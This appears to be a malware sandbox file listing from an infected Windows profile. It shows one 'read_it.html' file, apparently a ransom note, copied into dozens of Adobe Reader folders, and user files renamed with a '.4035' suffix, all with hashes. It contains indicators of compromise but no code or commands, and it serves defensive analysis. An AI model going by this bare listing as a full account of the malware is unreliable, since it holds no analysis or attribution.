c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\fi_fi\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\eu_es\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\eu_es\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\es_es\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\es_es\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\de_de\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\de_de\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\da_dk\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\da_dk\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\cs_cz\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\cs_cz\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\ca_es\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\ca_es\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\ukr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\tur\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\sve\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\suo\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\slv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\sky\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\rus\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\rum\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\ptb\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\pol\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\nor\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\nld\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\kor\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\jpn\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\ita\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\hun\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\hrv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\fra\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\euq\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\esp\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\enu\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\deu\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\dan\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\cze\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\cht\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\chs\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\legal\cat\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\javascripts\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\ukr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\tur\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\sve\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\suo\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\slv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\sky\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\rus\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\rum\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\ptb\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\pol\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\nor\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\nld\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\kor\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\jpn\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\ita\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\hun\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\hrv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\fra\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\esp\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\idtemplates\enu\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\documents\my shapes\favorites.vss.4035	1.80 KB (1840 bytes)	MD5: 07e593200b1b6d5fb49923941f54ae70 SHA1: 9d3863811bff04541156538a817e44a9c96d5808 SHA256: 92704ace6eb1bcd48171014583d1773925b81177b28edb996f9d723fc0839602	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\mozilla\firefox\profiles\5cb79syl.default\parent.lock.4035	1.80 KB (1840 bytes)	MD5: a10770cb938bae102f32772124ffb4cc SHA1: cf64d8f56f88c0232b1aee4150d3480e76008ef8 SHA256: 3eac792562300288986dacc00cce93bec2873aa2727b3676ffb9d371e11207d8	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\mozilla\firefox\profiles\5cb79syl.default\indexeddb\moz-safe-about+home\.metadata.4035	1.80 KB (1840 bytes)	MD5: 5b7014469b38ccb7195dae29fa8ad4e1 SHA1: f903a930195b60e289f6abc2403a6c6e47e106cf SHA256: c230b613368895a42fe5c009b63a80e8b9346b4f7712b313868d6ea6326e2913	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\adobe\acrobat\10.0\javascripts\glob.js.4035	1.80 KB (1840 bytes)	MD5: 9ad5ee48fc734fab6e97401208e1e8da SHA1: 0e99f7e4ff4e7d30f6bf668a3dc40e7c57ae97a9 SHA256: 154d3a906ea0c25907f82cc049815f986c444f9b45013d6ea549b3dd6100ba62	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst2635.tmp.4035	1.80 KB (1840 bytes)	MD5: 149a550984bbb76d5a52897b39893287 SHA1: 429e061c6f1973cad0ab9b5419640409e8659779 SHA256: 938bc773e3a74abf0682baa11516e07514c91840a2ce08c274b7daa9c73664db	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst28b4.tmp.4035	1.80 KB (1840 bytes)	MD5: 3889dd6c5e649a56f64282ed3ea9ea25 SHA1: 69b70805d064ee4c697dbb354aa3395dc4b657ab SHA256: cb5b6f812df2708df4ddc06f93206c342eff19b37f5a63143579411c8e31b1d9	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst2960.tmp.4035	1.80 KB (1840 bytes)	MD5: b8b9752b35b51efcae407d9665736ee3 SHA1: f076f1c4ae1ac3744717d6dbad139baeea6d1e8b SHA256: cac9203f208e01ef103d33fcd7bf9e162f930bf815b371d0b4c56077c355d2d4	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst2f3a.tmp.4035	1.80 KB (1840 bytes)	MD5: 09e0fd787b7c8be20ea7f29d2efba5f7 SHA1: 115301a5cceb8909c7643905a77c69e199eb9e55 SHA256: 1eaf62717ace3fe73d1f76b0f0f44db6c4a223f84e872c37852f23c236eca5fb	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst4105.tmp.4035	1.80 KB (1840 bytes)	MD5: cb18331d5c14888b413fe39795277a9e SHA1: 1c0cd71c83c98fe21a739029d8c16c10255b8859 SHA256: 0e9ab1cfe335e636091297a4c6b4cf1a349c7a7c83512cbcdc3e1870a3407770	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst423d.tmp.4035	1.80 KB (1840 bytes)	MD5: d955136674aab1f2654c8744050da94d SHA1: 608f61f6dbde2792033936ae988cb814f946babe SHA256: 9da752d868e3d844745d2d923153c59c683d21ee282c60302077aff74a76e8e6	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst4558.tmp.4035	1.80 KB (1840 bytes)	MD5: f433140f5e888b4182bd2804c1a646e1 SHA1: c6815b4d3cc76d2d0ddc57c2281c18e3f56dbf89 SHA256: 32d50d668dac88e7ab21cda68b1ca7a8a983c13bd1c42389fd3af90223ade3d6	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst47f7.tmp.4035	1.80 KB (1840 bytes)	MD5: 1567cbcb62ad49f7d54e2f573b270c07 SHA1: e88e7d519bf88974255f5f666fd4b49b04571fd9 SHA256: 89fba1eaf0b29db4e9356aab2723713b02f476f536c36f5e8001ac22a61ac266	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst531e.tmp.4035	1.80 KB (1840 bytes)	MD5: 88e9df3467882291ca396a66a40e9364 SHA1: b5e7c389c5633b4aa2c2b2f8710b98e53a077b63 SHA256: 61215670fa920629eacf670b802853d69fea0a345df569901f79db0dad21c4bb	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst5511.tmp.4035	1.80 KB (1840 bytes)	MD5: f92e870a2b72ff6b511c7102da74c4aa SHA1: 74abb7e60560b2608fdebb984fd524bb4ac0c010 SHA256: fcb3467a5044cbd56445e901f5eaaaa10bc6361aa5950e1e1a82e78ea2d56445	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst5994.tmp.4035	1.80 KB (1840 bytes)	MD5: b62b670449cc6b937a5fdec9171890fc SHA1: 6165595e13baa3090d72ad0174709f771b72447f SHA256: 62a2a2c1c8750511066077dcaf6f02e0481b98037a762699aaea024dd2b2f8e1	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst5cbf.tmp.4035	1.80 KB (1840 bytes)	MD5: e0e823c4783951bfc8ad2c089d117f6c SHA1: c33db62f544f1975b2a346f96c72a0be24422896 SHA256: f3444ef8be4214617d3b626a8c1d03e4317d8656240cd08c80b26bd1e7a7670b	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst7953.tmp.4035	1.80 KB (1840 bytes)	MD5: baf0c37154a75c18b469c238ab68b4d4 SHA1: 540bae9b04af9cc6526fcd54b3664e63e0204486 SHA256: 0f0c49bac2ed9915ff240287a9c28ed5aa801d5fa1888d4a8219abc73028d4ee	File Actions Show Properties Download
